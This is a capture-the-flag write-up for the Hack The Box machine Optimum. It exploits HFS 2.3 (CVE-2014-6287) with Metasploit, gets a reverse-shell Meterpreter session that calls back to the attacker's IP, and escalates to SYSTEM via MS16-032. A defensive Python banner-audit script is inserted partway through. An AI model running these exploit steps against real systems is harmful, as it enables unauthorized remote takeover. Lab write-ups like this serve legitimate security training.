🕵 HTB-Writeup : OPTIMUM

Recon

Nmap scan

With nmap we find only one open port (80), which hosts a web server.

# basic scan
nmap -sC -sV -p- -T5 10.10.10.8

PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Website

We browse to the website and, as the nmap scan indicated, find an HFS (HttpFileServer) server, version 2.3.

Vulnerabilities

We search for known vulnerabilities in Exploit-DB (with searchsploit) and in Metasploit.

# exploitdb
searchsploit HFS 2.3
HFS (HTTP File Server) 2.3.x - Remote Command Execution

# msfconsole
msf6 > search HFS 2.3

Matching Modules
================

   #  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/multi/http/git_client_command_exec  2014-12-18       excellent  No     Malicious Git and Mercurial HTTP Server For CVE-2014-9390
   1  exploit/windows/http/rejetto_hfs_exec       2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution

We find a well-known vulnerability, covered by the rejetto_hfs_exec module. Let’s try to get access to the server!
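Seen from the defender's side, the banner match that produced this finding can be run across scan results before anyone else does. The following is an added example, not part of the original writeup: it parses nmap normal output and flags open ports advertising HFS 2.3.x; the function name, the rule table and the second sample host are assumptions made for illustration.

```python
import re

# Triage rule built only from this page: the searchsploit hit "HFS (HTTP File
# Server) 2.3.x - Remote Command Execution" and the CVE-2014-6287 tag.
# A banner match is a lead to verify against the installed build, not proof.
RULES = [(
    re.compile(r"HttpFileServer|\bHFS\b", re.I),   # product name in banner
    re.compile(r"\b2\.3(?![0-9])"),                # 2.3, 2.3.x; not 2.30 or 12.3
    "HFS 2.3.x banner, see CVE-2014-6287",
)]

REPORT = re.compile(r"^Nmap scan report for (\S+)")
PORT_ROW = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
HEADER = re.compile(r"^\|[_ ]http-server-header:\s*(.*)$")

# Constructed sample: host 1 repeats the scan above, host 2 is invented.
SAMPLE = """\
Nmap scan report for 10.10.10.8
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
Nmap scan report for 192.0.2.20
80/tcp   open   http    HttpFileServer httpd 2.4
8080/tcp closed http-proxy
8081/tcp open   http
|_http-server-header: HFS 2.3
"""


def audit_nmap_output(text):
    """Return [(host, port, evidence, finding)] for open ports matching a rule."""
    hits, host, port = {}, "unknown", None
    for line in text.splitlines():
        if m := REPORT.match(line):
            host, port, evidence = m.group(1), None, ""
        elif m := PORT_ROW.match(line):
            # Remember the port only if open, so script lines attach to it.
            port = f"{m.group(1)}/{m.group(2)}" if m.group(3) == "open" else None
            evidence = m.group(5).strip()
        elif m := HEADER.match(line):
            evidence = m.group(1).strip()  # fallback when -sV gave no version
        else:
            continue
        for product, version, finding in RULES:
            if port and product.search(evidence) and version.search(evidence):
                hits.setdefault((host, port, finding), evidence)
    return [(h, p, ev, f) for (h, p, f), ev in hits.items()]

if __name__ == "__main__":
    print(*audit_nmap_output(SAMPLE), sep="\n")
```

Each port is reported once, with the first piece of evidence seen for it, so the `-sV` banner wins over the server header when both are present.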

Exploit

Entry point

We start the rejetto_hfs_exec module and run the exploit.

msf6 exploit(windows/http/rejetto_hfs_exec) > exploit

[*] Started reverse TCP handler on 10.10.16.6:4444 
[*] Using URL: http://10.10.16.6:8080/3D77WCI2aRHJnkl
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /3D77WCI2aRHJnkl
[*] Sending stage (175686 bytes) to 10.10.10.8
[*] Meterpreter session 3 opened (10.10.16.6:4444 -> 10.10.10.8:49213) at 2022-07-24 23:52:26 +0200
[*] Server stopped.
[!] This exploit may require manual cleanup of '%TEMP%\YSDfhnfRWto.vbs' on the target

C:\Users\kostas\Desktop> powershell.exe -c "whoami"
optimum\kostas

We are in! We are connected as the user kostas and can now get the user flag. Next we need a privesc to get the admin flag.

We first check system information with the sysinfo command.

meterpreter > sysinfo
Computer        : OPTIMUM
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : el_GR
Domain          : HTB
Logged On Users : 2
Meterpreter     : x86/windows

This is a Windows Server 2012 machine. With some research we find CVE-2016-0099, which allows a logged-in user to escalate privileges. We first search for a Metasploit module.

Privesc

msf6 > search CVE-2016-0099

Matching Modules
================

   #  Name                                                           Disclosure Date  Rank    Check  Description
   -  ----                                                           ---------------  ----    -----  -----------
   0  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  2016-03-21       normal  Yes    MS16-032 Secondary Logon Handle Privilege Escalation

There is a module, so let’s run the exploit! We first background our existing session.

# background the current meterpreter session
meterpreter > background

# check for our session
msf6 > sessions

Active sessions
===============

  Id  Name  Type                     Information               Connection
  --  ----  ----                     -----------               ----------
  1         meterpreter x86/windows  OPTIMUM\kostas @ OPTIMUM  10.10.16.6:4445 -> 10.10.10.8:49426 (10.10.10.8)

msf6 > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc

# configure options, don't forget to point to our session
msf6 > set session <ID session>
msf6 > exploit

C:\Users\kostas\Desktop>whoami
whoami
nt authority\system

The privesc works! We now own the system :)

Tags

Easy, External, HFS, Python, Penetration Tester Level 2, OS Command Injection, CVE-2014-6287, A03:2021-Injection, Network, CVE Exploitation, Public Vulnerabilities